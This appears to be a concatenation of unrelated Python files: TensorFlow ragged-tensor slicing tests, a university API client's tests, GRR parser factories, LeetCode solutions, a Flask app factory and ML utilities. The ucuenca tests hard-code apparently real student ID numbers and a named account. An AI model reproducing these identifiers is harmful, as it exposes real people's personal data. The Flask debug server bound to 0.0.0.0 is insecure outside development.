(SLICE_BUILDER[:, array_ops.newaxis],
[[row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
# Empty slice spec.
([], EXAMPLE_RAGGED_TENSOR_4D),
# Slicing inner ragged dimensions.
(SLICE_BUILDER[:, 1:4], [row[1:4] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, -2:], [row[-2:] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, :-1],
[[v[:-1] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, 1:2],
[[v[1:2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[1:, 1:3, 1:2],
[[v[1:2] for v in row[1:3]] for row in EXAMPLE_RAGGED_TENSOR_4D[1:]]),
# Strided slices
(SLICE_BUILDER[::2], EXAMPLE_RAGGED_TENSOR_4D[::2]),
(SLICE_BUILDER[::-1], EXAMPLE_RAGGED_TENSOR_4D[::-1]),
(SLICE_BUILDER[::-2], EXAMPLE_RAGGED_TENSOR_4D[::-2]),
(SLICE_BUILDER[1::2], EXAMPLE_RAGGED_TENSOR_4D[1::2]),
(SLICE_BUILDER[:, ::2], [row[::2] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, 1::2], [row[1::2] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, ::2],
[[v[::2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, 1::2],
[[v[1::2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, ::-1],
[[v[::-1] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, ::-2],
[[v[::-2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[..., ::-1, :],
[[v[::-1] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[..., ::-1], [[[v[::-1] for v in col] for col in row]
for row in EXAMPLE_RAGGED_TENSOR_4D]),
) # pyformat: disable
def testWithRaggedRank2(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_nested_row_splits(
EXAMPLE_RAGGED_TENSOR_4D_VALUES,
[EXAMPLE_RAGGED_TENSOR_4D_SPLITS1, EXAMPLE_RAGGED_TENSOR_4D_SPLITS2])
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_4D)
self._TestGetItem(rt, slice_spec, expected)
@parameterized.parameters(
# Test for errors in unsupported cases
(SLICE_BUILDER[:, 0], ValueError,
'Cannot index into an inner ragged dimension.'),
(SLICE_BUILDER[:, :, 0], ValueError,
'Cannot index into an inner ragged dimension.'),
# Test for out-of-bounds errors.
(SLICE_BUILDER[1, 0], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
(SLICE_BUILDER[0, 0, 3],
(IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
(SLICE_BUILDER[5], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[0, 5], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
)
def testErrorsWithRaggedRank2(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_nested_row_splits(
EXAMPLE_RAGGED_TENSOR_4D_VALUES,
[EXAMPLE_RAGGED_TENSOR_4D_SPLITS1, EXAMPLE_RAGGED_TENSOR_4D_SPLITS2])
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_4D)
self._TestGetItemException(rt, slice_spec, expected, message)
@parameterized.parameters(
(SLICE_BUILDER[:], []),
(SLICE_BUILDER[2:], []),
(SLICE_BUILDER[:-3], []),
)
def testWithEmptyTensor(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_row_splits([], [0])
self._TestGetItem(rt, slice_spec, expected)
@parameterized.parameters(
(SLICE_BUILDER[0], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[-1], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
)
def testErrorsWithEmptyTensor(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_row_splits([], [0])
self._TestGetItemException(rt, slice_spec, expected, message)
@parameterized.parameters(
(SLICE_BUILDER[-4], EXAMPLE_RAGGED_TENSOR_2D[-4]),
(SLICE_BUILDER[0], EXAMPLE_RAGGED_TENSOR_2D[0]),
(SLICE_BUILDER[-3:], EXAMPLE_RAGGED_TENSOR_2D[-3:]),
(SLICE_BUILDER[:3], EXAMPLE_RAGGED_TENSOR_2D[:3]),
(SLICE_BUILDER[3:5], EXAMPLE_RAGGED_TENSOR_2D[3:5]),
(SLICE_BUILDER[0, 1], EXAMPLE_RAGGED_TENSOR_2D[0][1]),
(SLICE_BUILDER[-3, 0], EXAMPLE_RAGGED_TENSOR_2D[-3][0]),
)
def testWithPlaceholderShapes(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
# Intentionally use an unknown shape for `splits`, to force the code path
# that deals with having nrows unknown at graph construction time.
splits = constant_op.constant(
EXAMPLE_RAGGED_TENSOR_2D_SPLITS, dtype=dtypes.int64)
splits = array_ops.placeholder_with_default(splits, None)
rt = RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_2D_VALUES, splits)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_2D)
self._TestGetItem(rt, slice_spec, expected)
@parameterized.parameters(
(SLICE_BUILDER[..., 2], ValueError,
'Ellipsis not supported for unknown shape RaggedTensors'),)
def testErrorsWithPlaceholderShapes(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
if not context.executing_eagerly():
# Intentionally use an unknown shape for `values`.
values = array_ops.placeholder_with_default([0], None)
rt = RaggedTensor.from_row_splits(values, [0, 1])
self._TestGetItemException(rt, slice_spec, expected, message)
def testNewAxis(self):
# rt: [[[['a', 'b'], ['c', 'd']], [], [['e', 'f']]], []]
splits1 = [0, 3, 3]
splits2 = [0, 2, 2, 3]
values = constant_op.constant([['a', 'b'], ['c', 'd'], ['e', 'f']])
rt = RaggedTensor.from_nested_row_splits(values, [splits1, splits2])
rt_newaxis0 = rt[array_ops.newaxis]
rt_newaxis1 = rt[:, array_ops.newaxis]
rt_newaxis2 = rt[:, :, array_ops.newaxis]
rt_newaxis3 = rt[:, :, :, array_ops.newaxis]
rt_newaxis4 = rt[:, :, :, :, array_ops.newaxis]
self.assertAllEqual(
rt, [[[[b'a', b'b'], [b'c', b'd']], [], [[b'e', b'f']]], []])
self.assertAllEqual(
rt_newaxis0, [[[[[b'a', b'b'], [b'c', b'd']], [], [[b'e', b'f']]], []]])
self.assertAllEqual(
rt_newaxis1,
[[[[[b'a', b'b'], [b'c', b'd']], [], [[b'e', b'f']]]], [[]]])
self.assertAllEqual(
rt_newaxis2,
[[[[[b'a', b'b'], [b'c', b'd']]], [[]], [[[b'e', b'f']]]], []])
self.assertAllEqual(
rt_newaxis3,
[[[[[b'a', b'b']], [[b'c', b'd']]], [], [[[b'e', b'f']]]], []])
self.assertAllEqual(
rt_newaxis4,
[[[[[b'a'], [b'b']], [[b'c'], [b'd']]], [], [[[b'e'], [b'f']]]], []])
self.assertEqual(rt.ragged_rank, 2)
self.assertEqual(rt_newaxis0.ragged_rank, 3)
self.assertEqual(rt_newaxis1.ragged_rank, 3)
self.assertEqual(rt_newaxis2.ragged_rank, 3)
self.assertEqual(rt_newaxis3.ragged_rank, 2)
self.assertEqual(rt_newaxis4.ragged_rank, 2)
self.assertEqual(rt_newaxis0.shape.as_list(), [1, 2, None, None, 2])
self.assertEqual(rt_newaxis1.shape.as_list(), [2, 1, None, None, 2])
self.assertEqual(rt_newaxis2.shape.as_list(), [2, None, 1, None, 2])
self.assertEqual(rt_newaxis3.shape.as_list(), [2, None, None, 1, 2])
self.assertEqual(rt_newaxis4.shape.as_list(), [2, None, None, 2, 1])
@parameterized.parameters(
# EXAMPLE_RAGGED_TENSOR_3D.shape = [2, 3, None]
# Indexing into uniform_row_splits dimension:
(SLICE_BUILDER[:, 1], [r[1] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[:, 2], [r[2] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[:, -2], [r[-2] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[:, -3], [r[-3] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[1:, 2], [r[2] for r in EXAMPLE_RAGGED_TENSOR_3D[1:]],
[1, None]),
(SLICE_BUILDER[:, 1, 1:], [r[1][1:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[1:, 1, 1:],
[r[1][1:] for r in EXAMPLE_RAGGED_TENSOR_3D[1:]],
[1, None]),
# Slicing uniform_row_splits dimension:
(SLICE_BUILDER[:, 2:], [r[2:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 1, None]),
(SLICE_BUILDER[:, -2:], [r[-2:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 2, None]),
(SLICE_BUILDER[:, :, 1:],
[[c[1:] for c in r] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 3, None]),
(SLICE_BUILDER[:, 5:], [r[5:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 0, None]),
# Slicing uniform_row_splits dimension with a non-default step size:
(SLICE_BUILDER[:, ::2], [r[::2] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 2, None]),
(SLICE_BUILDER[:, ::-1], [r[::-1] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 3, None]),
) # pyformat: disable
def testWithUniformRowLength(self, slice_spec, expected, expected_shape):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_uniform_row_length(
RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_3D_VALUES,
EXAMPLE_RAGGED_TENSOR_3D_SPLITS),
EXAMPLE_RAGGED_TENSOR_3D_ROWLEN)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_3D)
self.assertIsNot(rt.uniform_row_length, None)
self._TestGetItem(rt, slice_spec, expected, expected_shape)
# If the result is 3D, then check that it still has a uniform row length:
actual = rt.__getitem__(slice_spec) # pylint: disable=assignment-from-no-return
if actual.shape.rank == 3:
self.assertIsNot(actual.uniform_row_length, None)
self.assertAllEqual(actual.uniform_row_length, expected_shape[1])
@parameterized.parameters(
(SLICE_BUILDER[:, 3], errors.InvalidArgumentError, 'out of bounds'),
(SLICE_BUILDER[:, -4], errors.InvalidArgumentError, 'out of bounds'),
(SLICE_BUILDER[:, 10], errors.InvalidArgumentError, 'out of bounds'),
(SLICE_BUILDER[:, -10], errors.InvalidArgumentError, 'out of bounds'),
)
def testErrorsWithUniformRowLength(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_uniform_row_length(
RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_3D_VALUES,
EXAMPLE_RAGGED_TENSOR_3D_SPLITS),
EXAMPLE_RAGGED_TENSOR_3D_ROWLEN)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_3D)
self._TestGetItemException(rt, slice_spec, expected, message)
if __name__ == '__main__':
googletest.main()
|
import unittest
import json
import os
from ucuenca.ucuenca import Ucuenca
TEST_RESOURCES = os.path.join(
os.path.dirname(__file__),
"..", "tests_resources"
)
class GetCareersTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_careers(self):
"""Check 0104926787's careers."""
student_id = '0104926787'
expected_result = self._get_careers()
actual_result = self.ucuenca.careers(student_id)
self.assertEqual(expected_result, actual_result)
def test_careers_invalid_student(self):
"""Check invalid student's careers."""
student_id = '1234567890'
result = self.ucuenca.careers(student_id)
self.assertFalse(result)
def _get_careers(self):
path = os.path.join(TEST_RESOURCES, "careers.json")
with open(path) as f:
json_file = json.load(f)
return json_file
class GetNotesTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
@unittest.expectedFailure
def test_notes(self):
"""Check 0302068309's notes."""
student_id = '0302068309'
career_id = 16
        period_id = 115
        expected_result = {} # TODO
        actual_result = self.ucuenca.notes(student_id, career_id, period_id)
self.assertEqual(actual_result, expected_result)
def test_notes_invalid_student(self):
"""Check invalid student's notes."""
student_id = '1234567890'
career_id = 34
        period_id = 115
        result = self.ucuenca.notes(student_id, career_id, period_id)
self.assertFalse(result)
class GetScheduleTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_schedule(self):
"""Check 0104378690's schedule."""
student_id = '0104378690'
expected_result = self._get_schedule()
actual_result = self.ucuenca.schedule(student_id)
self.assertEqual(actual_result, expected_result)
    def test_schedule_invalid_student(self):
"""Check invalid student's schedule."""
student_id = '1234567890'
result = self.ucuenca.schedule(student_id)
self.assertFalse(result)
def _get_schedule(self):
path = os.path.join(TEST_RESOURCES, "schedule.json")
with open(path) as f:
json_file = json.load(f)
return json_file
class GetCurriculumProgressTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_curriculum_progress(self):
"""Check 0104926787's curriculum progress."""
student_id = '0104926787'
career_id = 44
curriculum_id = 1
career_plan = 4
expected_result = self._get_curriculum_progress()
actual_result = self.ucuenca.curriculum_progress(
student_id, career_id, curriculum_id, career_plan
)
self.assertEqual(actual_result, expected_result)
def test_curriculum_progress_invalid_student(self):
"""Check invalid student's curriculum progress."""
student_id = '1234567890'
career_id = 44
curriculum_id = 1
career_plan = 4
result = self.ucuenca.curriculum_progress(
student_id, career_id, curriculum_id, career_plan
)
self.assertFalse(result)
def _get_curriculum_progress(self):
path = os.path.join(TEST_RESOURCES, "curriculum_progress.json")
with open(path) as f:
json_file = json.load(f)
return json_file
class AuthenticationTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_bad_password(self):
"""Check authentication with a bad password."""
user = 'santos.gallegos'
passw = '1234'
result = self.ucuenca.authentication(user, passw)
self.assertFalse(result['autenticacion'])
|
from pathlib import Path
from fhir.resources.valueset import ValueSet as _ValueSet
from oops_fhir.utils import ValueSet
__all__ = ["CommonUCUMCodesForAge"]
_resource = _ValueSet.parse_file(Path(__file__).with_suffix(".json"))
class CommonUCUMCodesForAge(ValueSet):
"""
Common UCUM Codes for Age
Unified Code for Units of Measure (UCUM). This value set includes all
UCUM codes
Status: draft - Version: 4.0.1
http://hl7.org/fhir/ValueSet/age-units
"""
# TODO: fix this template issue1
pass
class Meta:
resource = _resource
|
#!/usr/bin/env python
"""Generic parsers (for GRR server and client code)."""
from typing import Iterator
from typing import Text
from typing import Type
from typing import TypeVar
from grr_response_core.lib import factory
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.parsers import abstract
from grr_response_core.lib.util import collection
from grr_response_core.lib.util import precondition
ParseError = abstract.ParseError
Parser = abstract.Parser
SingleResponseParser = abstract.SingleResponseParser
SingleFileParser = abstract.SingleFileParser
MultiResponseParser = abstract.MultiResponseParser
MultiFileParser = abstract.MultiFileParser
_Factory = factory.Factory
_RDFValue = rdfvalue.RDFValue
SINGLE_RESPONSE_PARSER_FACTORY: _Factory[SingleResponseParser[_RDFValue]] = (
_Factory(SingleResponseParser[_RDFValue]))
MULTI_RESPONSE_PARSER_FACTORY: _Factory[MultiResponseParser[_RDFValue]] = (
_Factory(MultiResponseParser[_RDFValue]))
SINGLE_FILE_PARSER_FACTORY: _Factory[SingleFileParser[_RDFValue]] = (
_Factory(SingleFileParser[_RDFValue]))
MULTI_FILE_PARSER_FACTORY: _Factory[MultiFileParser[_RDFValue]] = (
_Factory(MultiFileParser[_RDFValue]))
_P = TypeVar("_P", bound=Parser)
class ArtifactParserFactory(object):
"""A factory wrapper class that yields parsers for specific artifact."""
def __init__(self, artifact_name: Text) -> None:
"""Initializes the artifact parser factory.
Args:
artifact_name: A name of the artifact this factory is supposed to provide
parser instances for.
"""
precondition.AssertType(artifact_name, Text)
self._artifact_name = artifact_name
def HasParsers(self) -> bool:
return (self.HasSingleResponseParsers() or self.HasMultiResponseParsers() or
self.HasSingleFileParsers() or self.HasMultiFileParsers())
def HasSingleResponseParsers(self) -> bool:
return any(self.SingleResponseParserTypes())
def SingleResponseParsers(self) -> Iterator[SingleResponseParser[_RDFValue]]:
return self._CreateSupportedParsers(SINGLE_RESPONSE_PARSER_FACTORY)
def SingleResponseParserTypes(
self) -> Iterator[Type[SingleResponseParser[_RDFValue]]]:
return self._SupportedTypes(SINGLE_RESPONSE_PARSER_FACTORY)
def HasMultiResponseParsers(self) -> bool:
return any(self.MultiResponseParserTypes())
def MultiResponseParsers(self) -> Iterator[MultiResponseParser[_RDFValue]]:
return self._CreateSupportedParsers(MULTI_RESPONSE_PARSER_FACTORY)
def MultiResponseParserTypes(
self) -> Iterator[Type[MultiResponseParser[_RDFValue]]]:
return self._SupportedTypes(MULTI_RESPONSE_PARSER_FACTORY)
def HasSingleFileParsers(self) -> bool:
return any(self.SingleFileParserTypes())
def SingleFileParsers(self) -> Iterator[SingleFileParser[_RDFValue]]:
return self._CreateSupportedParsers(SINGLE_FILE_PARSER_FACTORY)
def SingleFileParserTypes(
self) -> Iterator[Type[SingleFileParser[_RDFValue]]]:
return self._SupportedTypes(SINGLE_FILE_PARSER_FACTORY)
def HasMultiFileParsers(self) -> bool:
return any(self.MultiFileParserTypes())
def MultiFileParsers(self) -> Iterator[MultiFileParser[_RDFValue]]:
return self._CreateSupportedParsers(MULTI_FILE_PARSER_FACTORY)
def MultiFileParserTypes(self) -> Iterator[Type[MultiFileParser[_RDFValue]]]:
return self._SupportedTypes(MULTI_FILE_PARSER_FACTORY)
def AllParserTypes(self) -> Iterator[Type[Parser[_RDFValue]]]:
"""Returns all known parser types applicable for the artifact."""
return collection.Flatten([
self.SingleResponseParserTypes(),
self.MultiResponseParserTypes(),
self.SingleFileParserTypes(),
self.MultiFileParserTypes(),
])
def _CreateSupportedParsers(self, fac: _Factory[_P]) -> Iterator[_P]:
for name in fac.Names():
cls = fac.GetType(name)
if self._artifact_name in cls.supported_artifacts:
yield fac.Create(name)
def _SupportedTypes(self, fac: _Factory[_P]) -> Iterator[Type[_P]]:
for name in fac.Names():
cls = fac.GetType(name)
if self._artifact_name in cls.supported_artifacts:
yield cls
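# A hedged usage sketch (not part of this module): querying the registered
# parsers for a single artifact. The artifact name below is hypothetical and
# the parser factories are normally populated elsewhere at startup.
if __name__ == "__main__":
  example_factory = ArtifactParserFactory("SomeArtifact")
  print(example_factory.HasParsers())
  for parser_type in example_factory.AllParserTypes():
    print(parser_type.__name__)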
|
from discord.ext import commands
"""
A custom cooldown bucket type subclassing the built-in cooldown buckets from
discord.ext.commands. It keys cooldowns on an arbitrary piece of text, enabling
things like per-`Tag` cooldowns or message spam detection.
"""
class MessageTextBucket(commands.BucketType):
custom = 7
def get_key(self, text):
return text
def __call__(self, msg):
return self.get_key(msg)
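# A hedged usage sketch (API assumed, not verified against discord.py): pairing
# this bucket type with a cooldown mapping keyed on a tag name rather than on a
# user or guild. Kept as comments since the exact mapping API is an assumption.
# cooldown = commands.CooldownMapping.from_cooldown(1, 60.0, MessageTextBucket.custom)
# bucket = cooldown.get_bucket(tag_name)
# retry_after = bucket.update_rate_limit()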
|
from typing import List
class Solution:
def findGCD(self, nums: List[int]) -> int:
a, b = min(nums), max(nums)
for i in range(a, 1, -1):
if b % i == 0 and a % i == 0:
return i
return 1
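# Example: Solution().findGCD([2, 5, 6, 9, 10]) returns 2, the greatest common
# divisor of min(nums)=2 and max(nums)=10. An equivalent (and faster) one-liner
# would be math.gcd(min(nums), max(nums)).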
|
__source__ = 'https://leetcode.com/problems/insert-into-a-binary-search-tree/'
# Time: O(h) h: height of the tree
# Space: O(h)
#
# Description: Leetcode # 701. Insert into a Binary Search Tree
#
# Given the root node of a binary search tree (BST) and a value to be inserted into the tree,
# insert the value into the BST. Return the root node of the BST after the insertion.
# It is guaranteed that the new value does not exist in the original BST.
#
# Note that there may exist multiple valid ways for the insertion,
# as long as the tree remains a BST after insertion.
# You can return any of them.
#
# For example,
#
# Given the tree:
# 4
# / \
# 2 7
# / \
# 1 3
# And the value to insert: 5
# You can return this binary search tree:
#
# 4
# / \
# 2 7
# / \ /
# 1 3 5
# This tree is also valid:
#
# 5
# / \
# 2 7
# / \
# 1 3
# \
# 4
#
import unittest
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
#108ms 55.06%
class Solution(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
if not root:
root = TreeNode(val)
return root
if val > root.val:
root.right = self.insertIntoBST(root.right, val)
else:
root.left = self.insertIntoBST(root.left, val)
return root
#100ms 98.14%
class Solution2(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
return Solution2.BST_insert(root, val)
@staticmethod
def BST_insert(root, val):
if root == None:
root = TreeNode(val)
elif root.val < val:
            root.right = Solution2.BST_insert(root.right, val)
        else:
            root.left = Solution2.BST_insert(root.left, val)
return root
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
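    def test_insertIntoBST(self):
        # Minimal sketch exercising the recursive solution on the example tree
        # [4,2,7,1,3] from the description: inserting 5 should attach it as the
        # left child of 7.
        root = TreeNode(4)
        root.left = TreeNode(2)
        root.right = TreeNode(7)
        root.left.left = TreeNode(1)
        root.left.right = TreeNode(3)
        root = Solution().insertIntoBST(root, 5)
        self.assertEqual(5, root.right.left.val)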
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
/**
* Definition for a binary tree node.
* public class TreeNode {
* int val;
* TreeNode left;
* TreeNode right;
* TreeNode(int x) { val = x; }
* }
*/
The time complexity of the insertion operation is the same as that of search, which is O(h):
O(N) in the worst case and O(log N) if the tree is well balanced.
The space complexity of the recursive solution is O(h) as well,
in other words O(N) in the worst case and O(log N) ideally.
If you implement the algorithm iteratively, the space complexity can be O(1).
# Recursion
# 1ms 100%
class Solution {
public TreeNode insertIntoBST(TreeNode root, int val) {
if (root == null) return new TreeNode(val);
if (val < root.val) {
root.left = insertIntoBST(root.left, val);
} else {
root.right = insertIntoBST(root.right, val);
}
return root;
}
}
Ex: [7,3,9,2,5], insert 4,
the new BST will be : [7,3,9,2,5,null,null,null,null,4]. no need to balance
# Iteration
# 1ms 100%
class Solution {
public TreeNode insertIntoBST(TreeNode root, int val) {
if(root == null) return new TreeNode(val);
TreeNode cur = root;
while(true) {
if(cur.val <= val) {
if(cur.right != null) cur = cur.right;
else {
cur.right = new TreeNode(val);
break;
}
} else {
if(cur.left != null) cur = cur.left;
else {
cur.left = new TreeNode(val);
break;
}
}
}
return root;
}
}
'''
|
from flask import Flask, json
import logging
def log_exception(sender, exception, **extra):
sender.logger.debug('Got exception during processing: %s', exception)
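# Sketch (not wired up in the original): log_exception could be registered on
# Flask's got_request_exception signal inside create_app, e.g.
#
#   from flask import got_request_exception
#   got_request_exception.connect(log_exception, app)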
def create_app(config_file):
    # Instantiate Flask and apply the config
app = Flask(__name__)
app.config.from_object(config_file)
from app import api_bp
app.register_blueprint(api_bp, url_prefix='/api')
#Or db = SQLAlchemy(app) then use this db ref in model definition
from model import db
db.init_app(app)
@app.route('/')
def index():
        # Flask views must return a response; a bare `pass` would return None and raise.
        return 'Case Service API'
@app.route('/isAlive')
def is_alive():
res = app.response_class(
response=json.dumps('Case Service API is healthy'),
mimetype='application/json'
)
return res
return app
if __name__ == "__main__":
app = create_app("config")
    app.run(debug=True, host='0.0.0.0', port=8000)
|
#!/usr/bin/env python3
"""This is an example to train a task with TRPO algorithm.
Here it runs CubeCrash-v0 environment with 100 iterations.
"""
import click
import gym
from metarl import wrap_experiment
from metarl.envs import MetaRLEnv, normalize
from metarl.experiment import LocalTFRunner
from metarl.experiment.deterministic import set_seed
from metarl.tf.algos import TRPO
from metarl.tf.baselines import GaussianCNNBaseline
from metarl.tf.policies import CategoricalCNNPolicy
@click.command()
@click.option('--batch_size', type=int, default=4000)
@wrap_experiment
def trpo_cubecrash(ctxt=None, seed=1, batch_size=4000):
"""Train TRPO with CubeCrash-v0 environment.
Args:
ctxt (metarl.experiment.ExperimentContext): The experiment
configuration used by LocalRunner to create the snapshotter.
seed (int): Used to seed the random number generator to produce
determinism.
batch_size (int): Number of timesteps to use in each training step.
"""
set_seed(seed)
with LocalTFRunner(ctxt) as runner:
env = MetaRLEnv(normalize(gym.make('CubeCrash-v0')))
policy = CategoricalCNNPolicy(env_spec=env.spec,
filters=((32, (8, 8)), (64, (4, 4))),
strides=(4, 2),
padding='VALID',
hidden_sizes=(32, 32))
baseline = GaussianCNNBaseline(
env_spec=env.spec,
regressor_args=dict(filters=((32, (8, 8)), (64, (4, 4))),
strides=(4, 2),
padding='VALID',
hidden_sizes=(32, 32),
use_trust_region=True))
algo = TRPO(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
discount=0.99,
gae_lambda=0.95,
lr_clip_range=0.2,
policy_ent_coeff=0.0,
flatten_input=False)
runner.setup(algo, env)
runner.train(n_epochs=100, batch_size=batch_size)
trpo_cubecrash()
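# Usage sketch: the click option above makes the batch size configurable from
# the command line, e.g. (assuming this file is saved as trpo_cubecrash.py):
#
#   python trpo_cubecrash.py --batch_size 2048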
|
"""
mpld3 Utilities
===============
Utility routines for the mpld3 package
"""
import os
import re
import shutil
import warnings
from functools import wraps
from . import urls
# Make sure that DeprecationWarning gets printed
warnings.simplefilter("always", DeprecationWarning)
def html_id_ok(objid, html5=False):
"""Check whether objid is valid as an HTML id attribute.
If html5 == True, then use the more liberal html5 rules.
"""
if html5:
        return not re.search(r'\s', objid)
else:
        return bool(re.match(r"^[a-zA-Z][a-zA-Z0-9\-\.\:\_]*$", objid))
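# For example, html_id_ok("el1234") is True, while html_id_ok("1234el") is
# False because an HTML4 id must start with a letter.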
def get_id(obj, suffix="", prefix="el", warn_on_invalid=True):
"""Get a unique id for the object"""
if not suffix:
suffix = ""
if not prefix:
prefix = ""
objid = prefix + str(os.getpid()) + str(id(obj)) + suffix
if warn_on_invalid and not html_id_ok(objid):
warnings.warn('"{0}" is not a valid html ID. This may cause problems')
return objid
def deprecated(func, old_name, new_name):
"""Decorator to mark functions as deprecated."""
@wraps(func)
def new_func(*args, **kwargs):
warnings.warn(("{0} is deprecated and will be removed. "
"Use {1} instead".format(old_name, new_name)),
category=DeprecationWarning)
return func(*args, **kwargs)
new_func.__doc__ = ("*%s is deprecated: use %s instead*\n\n "
% (old_name, new_name)) + new_func.__doc__
return new_func
def write_ipynb_local_js(location=None, d3_src=None, mpld3_src=None):
"""
Write the mpld3 and d3 javascript libraries to the given file location.
This utility is used by the IPython notebook tools to enable easy use
of mpld3 with no web connection.
Parameters
----------
    location : string (optional)
the directory in which the d3 and mpld3 javascript libraries will be
written. If not specified, the IPython nbextensions directory will be
used. If IPython doesn't support nbextensions (< 2.0),
the current working directory will be used.
d3_src : string (optional)
the source location of the d3 library. If not specified, the standard
path in mpld3.urls.D3_LOCAL will be used.
mpld3_src : string (optional)
the source location of the mpld3 library. If not specified, the
standard path in mpld3.urls.MPLD3_LOCAL will be used.
Returns
-------
d3_url, mpld3_url : string
The URLs to be used for loading these js files.
"""
if location is None:
try:
from IPython.html import install_nbextension
except ImportError:
location = os.getcwd()
nbextension = False
else:
nbextension = True
else:
nbextension = False
if d3_src is None:
d3_src = urls.D3_LOCAL
if mpld3_src is None:
mpld3_src = urls.MPLD3_LOCAL
d3js = os.path.basename(d3_src)
mpld3js = os.path.basename(mpld3_src)
if not os.path.exists(d3_src):
raise ValueError("d3 src not found at '{0}'".format(d3_src))
if not os.path.exists(mpld3_src):
raise ValueError("mpld3 src not found at '{0}'".format(mpld3_src))
if nbextension:
# IPython 2.0+.
# This will not work if a url prefix is added
prefix = '/nbextensions/'
try:
install_nbextension([d3_src, mpld3_src])
except IOError:
# files may be read only. We'll try deleting them and re-installing
from IPython.utils.path import get_ipython_dir
nbext = os.path.join(get_ipython_dir(), "nbextensions")
for src in [d3_src, mpld3_src]:
dest = os.path.join(nbext, os.path.basename(src))
if os.path.exists(dest):
os.remove(dest)
install_nbextension([d3_src, mpld3_src])
else:
# IPython < 2.0 or explicit path.
# This won't work if users have changed the kernel directory.
prefix = '/files/'
d3_dest = os.path.join(location, d3js)
mpld3_dest = os.path.join(location, mpld3js)
for src, dest in [(d3_src, d3_dest), (mpld3_src, mpld3_dest)]:
try:
shutil.copyfile(src, dest)
except IOError:
# file may be read only. We'll try deleting it first
if os.path.exists(dest):
os.remove(dest)
shutil.copyfile(src, dest)
return prefix + d3js, prefix + mpld3js
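# Usage sketch: write the local js files into the current directory and use the
# returned URLs when embedding figures without a network connection, e.g.
#
#   d3_url, mpld3_url = write_ipynb_local_js(location=".")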
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from operations import FactorizedReduce, StdConv, MixedOp
class Cell(nn.Module):
""" Cell for search
Each edge is mixed and continuous relaxed.
"""
def __init__(self, num_nodes, c_prev_prev, c_prev, c_cur, reduction_prev, reduction_cur, search_space):
"""
Args:
num_nodes: Number of intermediate cell nodes
c_prev_prev: channels_out[k-2]
            c_prev : channels_out[k-1]
            c_cur : channels_in[k] (current)
